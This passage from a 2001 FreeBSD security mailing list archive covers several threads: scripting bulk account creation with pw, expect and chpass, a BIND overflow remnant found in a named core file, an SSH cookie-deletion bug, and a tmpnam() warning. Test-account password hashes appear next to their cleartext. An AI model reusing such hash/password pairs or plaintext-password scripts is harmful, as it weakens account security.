tgx8fwK0d6cQM chpass: updating the database... chpass: done Notice that the encrypted password from the program appears to be the same as reported in vipw. But the user cannot login with the password. David --------------------------------------------------------------------- David R. Miner miner@lis.fsu.edu Systems Integrator voice: 850-644-8107 School of Information Studies fax: 850-644-6253 Florida State University Tallahassee, FL 32306-2100 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 11:49:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id 63A2737B403 for ; Thu, 7 Jun 2001 11:49:09 -0700 (PDT) (envelope-from karsten@rohrbach.de) Received: (qmail 69743 invoked by uid 1000); 7 Jun 2001 18:49:29 -0000 Date: Thu, 7 Jun 2001 20:49:29 +0200 From: "Karsten W. Rohrbach" To: David Miner Cc: edwin chan , Olivier Nicole , freebsd-security@FreeBSD.ORG Subject: Re: Encrypted passwords Message-ID: <20010607204929.U59617@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , David Miner , edwin chan , Olivier Nicole , freebsd-security@FreeBSD.ORG References: <20010607202014.S59617@mail.webmonster.de> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="rNtUoUA3Tn0/N1iC" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from david@slis-two.lis.fsu.edu on Thu, Jun 07, 2001 at 02:41:57PM -0400 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --rNtUoUA3Tn0/N1iC Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable David Miner(david@slis-two.lis.fsu.edu)@2001.06.07 14:41:57 +0000: > On Thu, 7 Jun 2001, Karsten W. Rohrbach wrote: >=20 > > a simple script using pwgen(1) from the ports collection to generate the > > cleartext password, using pw(8)'s instrumentation for passing a password > > to it via filehandle would simplify things a bit, i think. > > /k > > > It's not the generation of the passwords that is the problem. It's the > encryption. why bother encrypting the password if you already have instrumentation in the base system for that? you could create the account and use system() with pw -u user -h whatever piping a cleartext password into it, having the system care for the correct encryption (be it MD5 or 3DES or blowfish or whatever). i did exactly this on a mass-hosting system until we switched it to a different, ldap based, login system with direct application support (e.g. no real accounts, everything is one uid, validation is done in the ftp servers etc). from pw(1): --- -h fd This option provides a special interface by which intera= c- tive scripts can set an account password using pw. Beca= use the command line and environment are fundamentally insec= ure mechanisms by which programs can accept information, pw will only allow setting of account and group passwords v= ia a file descriptor (usually a pipe between an interactive script and the program). sh, bash, ksh and perl all pos- sess mechanisms by which this can be done. Alternativel= y, pw will prompt for the user's password if -h 0 is given, nominating stdin as the file descriptor on which to read the password. Note that this password will be read only once and is intended for use by a script rather than for interactive use. If you wish to have new password confi= r- mation along the lines of passwd(1), this must be imple- mented as part of an interactive script that calls pw. If a value of `-' is given as the argument fd, then the password will be set to `*', rendering the account inacc= es- sible via password-based login. --- /k >=20 > I put print statements into the program, created two users, and check > vipw. >=20 > These are the outputs: >=20 > entries in pwd.db: >=20 > try-1:wUe7aHIXK/8O.:1260:1337::0:0:LIStry-1:/usr/try-1:/bin/csh > try-2:tgx8fwK0d6cQM:1261:1338::0:0:LIStry-2:/usr/try-2:/bin/csh >=20 > Program output: >=20 > Enter password file name: pw7 > Password file read > Enter path to home directories: /usr > Enter class name: try > Enter first number wanted: 1 > Enter number of users wanted: 2 > try-1 chock1 >=20 > wUlVdJxRtry-1 /usr/try-1 wUe7aHIXK/8O. > chpass: updating the database... > chpass: done > try-2 chock1 >=20 > tgtM0gIZtry-2 /usr/try-2 tgx8fwK0d6cQM > chpass: updating the database... > chpass: done >=20 > Notice that the encrypted password from the program appears to be the same > as reported in vipw. But the user cannot login with the password. >=20 > David > --------------------------------------------------------------------- > David R. Miner miner@lis.fsu.edu > Systems Integrator voice: 850-644-8107 > School of Information Studies fax: 850-644-6253 > Florida State University > Tallahassee, FL 32306-2100 >=20 >=20 --=20 > Vegetarians for oral sex -- "The only meat that's fit to eat" KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.n= et/ karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 B= F46 --rNtUoUA3Tn0/N1iC Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7H8y5M0BPTilkv0YRAnziAKCMVyU2hHSwcGUK8OUEhYxoT0oZxgCeOmz/ dtQVmSLRAkcCw2rugGtKM/0= =jCfg -----END PGP SIGNATURE----- --rNtUoUA3Tn0/N1iC-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 12:10:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 47FC537B40A for ; Thu, 7 Jun 2001 12:10:13 -0700 (PDT) (envelope-from rjh@mohawk.net) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.11.3/8.11.3) with ESMTP id f57JFcD09210; Thu, 7 Jun 2001 15:15:38 -0400 (EDT) Date: Thu, 7 Jun 2001 15:15:38 -0400 (EDT) From: Ralph Huntington To: David Miner Cc: "Karsten W. Rohrbach" , edwin chan , Olivier Nicole , freebsd-security@FreeBSD.ORG Subject: Re: Encrypted passwords In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I use "expect" and a script-generated script for encrypting the passwd. Here's the shell script my account-maker script generates and then runs to set the password. This happens after the account-maker script uses "pw" to make the actual user account (which puts a "*" in the passwd field). #!/usr/local/bin/expect set argv username spawn -noecho passwd [lindex $argv 0] expect "Changing local password for username." send "" expect "word:" send "PassWord\r" expect "word:" send "PassWord\r" expect eof Obviously, have your script replace "username" with the actual username and "PassWord" with the actual plaintext password. For security. have your script unlink the expect script after it has run. This just uses the "passwd" command non-interactively thanks to the expect utility. It may not be terribly elegant, but I use this every day and it works fine. I hope it's useful for you! Ralph On Thu, 7 Jun 2001, David Miner wrote: > On Thu, 7 Jun 2001, Karsten W. Rohrbach wrote: > > > a simple script using pwgen(1) from the ports collection to generate the > > cleartext password, using pw(8)'s instrumentation for passing a password > > to it via filehandle would simplify things a bit, i think. > > /k > > > It's not the generation of the passwords that is the problem. It's the > encryption. > > I put print statements into the program, created two users, and check > vipw. > > These are the outputs: > > entries in pwd.db: > > try-1:wUe7aHIXK/8O.:1260:1337::0:0:LIStry-1:/usr/try-1:/bin/csh > try-2:tgx8fwK0d6cQM:1261:1338::0:0:LIStry-2:/usr/try-2:/bin/csh > > Program output: > > Enter password file name: pw7 > Password file read > Enter path to home directories: /usr > Enter class name: try > Enter first number wanted: 1 > Enter number of users wanted: 2 > try-1 chock1 > > wUlVdJxRtry-1 /usr/try-1 wUe7aHIXK/8O. > chpass: updating the database... > chpass: done > try-2 chock1 > > tgtM0gIZtry-2 /usr/try-2 tgx8fwK0d6cQM > chpass: updating the database... > chpass: done > > Notice that the encrypted password from the program appears to be the same > as reported in vipw. But the user cannot login with the password. > > David > --------------------------------------------------------------------- > David R. Miner miner@lis.fsu.edu > Systems Integrator voice: 850-644-8107 > School of Information Studies fax: 850-644-6253 > Florida State University > Tallahassee, FL 32306-2100 > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 12:34:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from q.closedsrc.org (ip233.gte15.rb1.bel.nwlink.com [209.20.244.233]) by hub.freebsd.org (Postfix) with ESMTP id CFDBB37B403 for ; Thu, 7 Jun 2001 12:34:09 -0700 (PDT) (envelope-from lplist@closedsrc.org) Received: by q.closedsrc.org (Postfix, from userid 1003) id DD64E55407; Thu, 7 Jun 2001 12:22:25 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by q.closedsrc.org (Postfix) with ESMTP id CD85D51610; Thu, 7 Jun 2001 12:22:25 -0700 (PDT) Date: Thu, 7 Jun 2001 12:22:25 -0700 (PDT) From: Linh Pham To: Greg Haa Cc: "'freebsd-security@FreeBSD.ORG'" Subject: Re: Named In-Reply-To: <2BFD35C3F1F9D31185CE00B0D0202302838707@SUNKING> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 2001-06-07, Greg Haa scribbled: # So this was in a named.core file. # # AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>BBBBBBBBBBBBBBBBBBBBBBB # BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB # AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>BBBBBBBBBBBBBBBBBBBBBB # BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAaa Could you include a snippet of your syslog? Just do 'more /var/log/messages' and see if there are any errors with 'named' listed. Also, do you know which version of BIND (ie: named) you are running? You can find out by running 'named -v'. It it's not 8.2.3-REL or 9.x.x then you should upgrade it to at least 8.2.3-REL (9.1.x preferred of course). It could be that you are getting hacked by a known security bug in earlier versions of BIND. -- Linh Pham [lplist@closedsrc.org] // 404b - Brain not found To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 13: 2:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id 52BD837B405 for ; Thu, 7 Jun 2001 13:02:06 -0700 (PDT) (envelope-from karsten@rohrbach.de) Received: (qmail 71965 invoked by uid 1000); 7 Jun 2001 20:02:27 -0000 Date: Thu, 7 Jun 2001 22:02:27 +0200 From: "Karsten W. Rohrbach" To: Ralph Huntington Cc: David Miner , edwin chan , Olivier Nicole , freebsd-security@FreeBSD.ORG Subject: Re: Encrypted passwords Message-ID: <20010607220227.W59617@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , Ralph Huntington , David Miner , edwin chan , Olivier Nicole , freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="oNLI4EWr1RPQuPCf" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from rjh@mohawk.net on Thu, Jun 07, 2001 at 03:15:38PM -0400 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --oNLI4EWr1RPQuPCf Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable correct me if i am just stupid, but i don't get the point echo -n passW0Rd | pw -u testuser -h 1 sets the password of "testuser" to "passW0Rd", soring it in the auth system you prefer in encrypted form. am i missing something? /k Ralph Huntington(rjh@mohawk.net)@2001.06.07 15:15:38 +0000: > I use "expect" and a script-generated script for encrypting the passwd. > Here's the shell script my account-maker script generates and then runs to > set the password. This happens after the account-maker script uses "pw" to > make the actual user account (which puts a "*" in the passwd field).=20 >=20 > #!/usr/local/bin/expect > set argv username > spawn -noecho passwd [lindex $argv 0] > expect "Changing local password for username." > send "" > expect "word:" > send "PassWord\r" > expect "word:" > send "PassWord\r" > expect eof >=20 > Obviously, have your script replace "username" with the actual username > and "PassWord" with the actual plaintext password. For security. have your > script unlink the expect script after it has run. >=20 > This just uses the "passwd" command non-interactively thanks to the expect > utility. It may not be terribly elegant, but I use this every day and it > works fine. I hope it's useful for you!=20 >=20 > Ralph >=20 > On Thu, 7 Jun 2001, David Miner wrote: >=20 > > On Thu, 7 Jun 2001, Karsten W. Rohrbach wrote: > >=20 > > > a simple script using pwgen(1) from the ports collection to generate = the > > > cleartext password, using pw(8)'s instrumentation for passing a passw= ord > > > to it via filehandle would simplify things a bit, i think. > > > /k > > > > > It's not the generation of the passwords that is the problem. It's the > > encryption. > >=20 > > I put print statements into the program, created two users, and check > > vipw. > >=20 > > These are the outputs: > >=20 > > entries in pwd.db: > >=20 > > try-1:wUe7aHIXK/8O.:1260:1337::0:0:LIStry-1:/usr/try-1:/bin/csh > > try-2:tgx8fwK0d6cQM:1261:1338::0:0:LIStry-2:/usr/try-2:/bin/csh > >=20 > > Program output: > >=20 > > Enter password file name: pw7 > > Password file read > > Enter path to home directories: /usr > > Enter class name: try > > Enter first number wanted: 1 > > Enter number of users wanted: 2 > > try-1 chock1 > >=20 > > wUlVdJxRtry-1 /usr/try-1 wUe7aHIXK/8O. > > chpass: updating the database... > > chpass: done > > try-2 chock1 > >=20 > > tgtM0gIZtry-2 /usr/try-2 tgx8fwK0d6cQM > > chpass: updating the database... > > chpass: done > >=20 > > Notice that the encrypted password from the program appears to be the s= ame > > as reported in vipw. But the user cannot login with the password. > >=20 > > David > > --------------------------------------------------------------------- > > David R. Miner miner@lis.fsu.edu > > Systems Integrator voice: 850-644-8107 > > School of Information Studies fax: 850-644-6253 > > Florida State University > > Tallahassee, FL 32306-2100 > >=20 > >=20 > >=20 > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > >=20 >=20 >=20 --=20 > "Niklaus Wirth has lamented that, whereas Europeans pronounce his name > correctly (Ni-klows Virt), Americans invariably mangle it into > (Nick-les Worth). Which is to say that Europeans call him by name, but > Americans call him by value." KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.n= et/ karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 B= F46 --oNLI4EWr1RPQuPCf Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7H93SM0BPTilkv0YRAhq8AKCRF35gi1Sh6NP8aMXRaiv3hiQw3wCcCT7X nHjbs0rpVSkWsLRCie7uxcg= =JAF3 -----END PGP SIGNATURE----- --oNLI4EWr1RPQuPCf-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 13:32:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from slis-two.lis.fsu.edu (slis-two.lis.fsu.edu [128.186.72.102]) by hub.freebsd.org (Postfix) with ESMTP id 1490437B409 for ; Thu, 7 Jun 2001 13:32:14 -0700 (PDT) (envelope-from david@slis-two.lis.fsu.edu) Received: from localhost (david@localhost) by slis-two.lis.fsu.edu (8.11.1/8.11.1) with ESMTP id f57KXcb65568; Thu, 7 Jun 2001 16:33:38 -0400 (EDT) (envelope-from david@slis-two.lis.fsu.edu) Date: Thu, 7 Jun 2001 16:33:38 -0400 (EDT) From: David Miner To: "Karsten W. Rohrbach" Cc: Ralph Huntington , edwin chan , Olivier Nicole , Subject: Re: Encrypted passwords In-Reply-To: <20010607220227.W59617@mail.webmonster.de> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 7 Jun 2001, Karsten W. Rohrbach wrote: > correct me if i am just stupid, but i don't get the point > echo -n passW0Rd | pw -u testuser -h 1 > sets the password of "testuser" to "passW0Rd", soring it in the auth > system you prefer in encrypted form. am i missing something? > > /k > No, I don't think you have missed the point. Using echo and piping it into pw would work. I am trying read the cleartext password from a file and, since I haven't figured out how the pw file descriptor works, encrypt it and use the chpass utility to get it into /etc/passwd. Because I have to do this 50 accounts at a time. It looks like it encrypts correctly, but the user cannot log in with that password. So something must be wrong with the encryption system or the way I have put the pieces together. David --------------------------------------------------------------------- David R. Miner miner@lis.fsu.edu Systems Integrator voice: 850-644-8107 School of Information Studies fax: 850-644-6253 Florida State University Tallahassee, FL 32306-2100 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 14:16:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from folly.informatik.uni-erlangen.de (muedi4-145-253-167-223.arcor-ip.net [145.253.167.223]) by hub.freebsd.org (Postfix) with ESMTP id D55B537B403 for ; Thu, 7 Jun 2001 14:16:49 -0700 (PDT) (envelope-from markus.friedl@informatik.uni-erlangen.de) Received: by folly.informatik.uni-erlangen.de (Postfix, from userid 31451) id 8B4095582; Thu, 7 Jun 2001 23:16:40 +0200 (CEST) Date: Thu, 7 Jun 2001 23:16:40 +0200 From: Markus Friedl To: Andreas Haugsnes , security@freebsd.org Subject: Re: [fwd] SSH allows deletion of other users files... Message-ID: <20010607231640.A4172@folly> References: <20010606124702.A30808@lucky.net> <20010606124822.A26583@consistent.unicore.no> <20010606125321.A56634@mithrandr.moria.org> <20010606131130.A26605@consistent.unicore.no> <20010606143323.G18735@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010606143323.G18735@ringworld.oblivion.bg>; from roam@orbitel.bg on Wed, Jun 06, 2001 at 02:33:23PM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 06, 2001 at 02:33:23PM +0300, Peter Pentchev wrote: > > > Are you using X forwarding? (ie, ssh -X) > > Yes, disabling X forwarding would be an easy workaround. > Can somebody, however, test if the following patch resolves the problem? > It certainly does for me.. > > Well, ok, so there is still a race condition between the stat() and unlink() > in the cleanup procedure.. but since there is no funlink() yet, I do not > really think this one can be resolved :( And besides, there's a *much* > smaller window of opportunity there. i think it's simpler to switch uids when removing the cookie file. http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/session.c.diff?r1=1.77&r2=1.80 -m To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 14:16:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from intense.net (server.intense.net [199.217.236.1]) by hub.freebsd.org (Postfix) with ESMTP id 8BB8637B401 for ; Thu, 7 Jun 2001 14:16:52 -0700 (PDT) (envelope-from bobber@intense.net) Received: from bob ([209.248.134.245]) by intense.net (8.8.8/8.8.8) with SMTP id QAA54563; Thu, 7 Jun 2001 16:16:36 -0500 (CDT) Message-ID: <002d01c0ef97$238cbce0$6c01a8c0@mpcsecurity.com> From: "Robert Herrold" To: "Greg Haa" , References: <2BFD35C3F1F9D31185CE00B0D0202302838707@SUNKING> Subject: Re: Named Date: Thu, 7 Jun 2001 16:16:07 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Yes, that's someone trying to exploit your box using a named bug. Looks to me like you're running a <8.2.3 REL of bind. Make sure you're running bind 8.2.3 or later. If you're not, I would recommend you get chkrootkit to verify you haven't been rooted. www.chkrootkit.org Bob Herrold Senior Network Engineer Metropark Communications 10405 A Baur Blvd St Louis MO 63132 (314)439-1900 ----- Original Message ----- From: "Greg Haa" To: Sent: Thursday, June 07, 2001 1:37 PM Subject: Named > So this was in a named.core file. > > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>BBBBBBBBBBBBBBBBBBBBBBB > BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>BBBBBBBBBBBBBBBBBBBBBB > BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAaa > > or something very similar. Can you tel;l me what this means? > > > -thanks > > greg.haa@amux.com > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 15:11:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from alcatraz.iptelecom.net.ua (alcatraz.iptelecom.net.ua [212.9.224.15]) by hub.freebsd.org (Postfix) with ESMTP id 778DE37B408 for ; Thu, 7 Jun 2001 15:11:09 -0700 (PDT) (envelope-from ya@interpharm.kiev.ua) Received: from interpharm.kiev.ua (dialup11-42.iptelecom.net.ua [212.9.228.170]) by alcatraz.iptelecom.net.ua (8.9.3/8.9.3) with ESMTP id BAA55338 for ; Fri, 8 Jun 2001 01:11:03 +0300 (EEST) (envelope-from ya@interpharm.kiev.ua) Received: from localhost (localhost [127.0.0.1]) by interpharm.kiev.ua (8.11.2/8.11.2) with ESMTP id f57MAKd31833 for ; Fri, 8 Jun 2001 01:10:22 +0300 (EEST) Date: Fri, 8 Jun 2001 01:10:20 +0300 (EEST) From: Ruslan Kutsin To: Subject: ttt Message-ID: <20010608011009.T31829-100000@interpharm.kiev.ua> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org auth 2228b350 unsubscribe freebsd-security ya@interpharm.kiev.ua To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 18:28:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from mafalda.univalle.edu.co (mafalda.univalle.edu.co [200.24.102.10]) by hub.freebsd.org (Postfix) with ESMTP id DF47D37B401 for ; Thu, 7 Jun 2001 18:28:05 -0700 (PDT) (envelope-from buliwyf@libertad.univalle.edu.co) Received: from libertad.univalle.edu.co (libertad.univalle.edu.co [216.6.69.11]) by mafalda.univalle.edu.co (8.11.3/8.11.3) with ESMTP id f581S2U18323 for ; Thu, 7 Jun 2001 20:28:02 -0500 (GMT) Received: from localhost (buliwyf@localhost) by libertad.univalle.edu.co (8.10.0/8.10.0) with ESMTP id f581WWd55797 for ; Thu, 7 Jun 2001 20:32:33 -0500 (COT) Date: Thu, 7 Jun 2001 20:32:32 -0500 (COT) From: Buliwyf McGraw To: security@FreeBSD.ORG Subject: Unsafe Message Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Everytime that i compile something on my server, i get this message: warning: tmpnam() possibly used unsafely; consider using mkstemp() What it means? how i can avoid it? Thanks for any help. ======================================================================= Buliwyf McGraw Administrador del Servidor Libertad Centro de Servicios de Informacion Universidad del Valle ======================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 18:35:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from shemp.palomine.net (shemp.palomine.net [205.198.88.200]) by hub.freebsd.org (Postfix) with SMTP id D0A7E37B405 for ; Thu, 7 Jun 2001 18:35:56 -0700 (PDT) (envelope-from cjohnson@palomine.net) Received: (qmail 80325 invoked by uid 1000); 8 Jun 2001 01:35:55 -0000 Date: Thu, 7 Jun 2001 21:35:55 -0400 From: Chris Johnson To: Buliwyf McGraw Cc: security@FreeBSD.ORG Subject: Re: Unsafe Message Message-ID: <20010607213555.A80297@palomine.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from buliwyf@libertad.univalle.edu.co on Thu, Jun 07, 2001 at 08:32:32PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 07, 2001 at 08:32:32PM -0500, Buliwyf McGraw wrote: > Everytime that i compile something on my server, i get this message: > > warning: tmpnam() possibly used unsafely; consider using mkstemp() > > What it means? tmpnam() was possibly used unsafely > how i can avoid it? consider using mkstemp() Chris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 18:47:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from tomts7-srv.bellnexxia.net (tomts7.bellnexxia.net [209.226.175.40]) by hub.freebsd.org (Postfix) with ESMTP id 99BA037B405 for ; Thu, 7 Jun 2001 18:47:48 -0700 (PDT) (envelope-from glassfish@glassfish.net) Received: from frogbox.glassfish.net ([64.230.57.229]) by tomts7-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with SMTP id <20010608014744.UTYO19826.tomts7-srv.bellnexxia.net@frogbox.glassfish.net> for ; Thu, 7 Jun 2001 21:47:44 -0400 Received: (qmail 16663 invoked from network); 8 Jun 2001 01:47:38 -0000 Received: from unknown (HELO MAINWS) (192.0.0.20) by 192.0.0.4 with SMTP; 8 Jun 2001 01:47:38 -0000 From: "Michael Tang Helmeste" To: Subject: RE: Unsafe Message Date: Thu, 7 Jun 2001 21:47:23 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 In-Reply-To: <20010607213555.A80297@palomine.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org If its not in your code, its most likely in one of the libraries that it uses. -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Chris Johnson Sent: Thursday, June 07, 2001 9:36 PM To: Buliwyf McGraw Cc: security@FreeBSD.ORG Subject: Re: Unsafe Message On Thu, Jun 07, 2001 at 08:32:32PM -0500, Buliwyf McGraw wrote: > Everytime that i compile something on my server, i get this message: > > warning: tmpnam() possibly used unsafely; consider using mkstemp() > > What it means? tmpnam() was possibly used unsafely > how i can avoid it? consider using mkstemp() Chris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 19:26: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from mafalda.univalle.edu.co (mafalda.univalle.edu.co [200.24.102.10]) by hub.freebsd.org (Postfix) with ESMTP id 404F437B401 for ; Thu, 7 Jun 2001 19:25:55 -0700 (PDT) (envelope-from buliwyf@libertad.univalle.edu.co) Received: from libertad.univalle.edu.co (libertad.univalle.edu.co [216.6.69.11]) by mafalda.univalle.edu.co (8.11.3/8.11.3) with ESMTP id f582PjU05952 for ; Thu, 7 Jun 2001 21:25:45 -0500 (GMT) Received: from localhost (buliwyf@localhost) by libertad.univalle.edu.co (8.10.0/8.10.0) with ESMTP id f582UGS58738; Thu, 7 Jun 2001 21:30:16 -0500 (COT) Date: Thu, 7 Jun 2001 21:30:16 -0500 (COT) From: Buliwyf McGraw To: Michael Tang Helmeste Cc: security@FreeBSD.ORG Subject: RE: Unsafe Message In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) 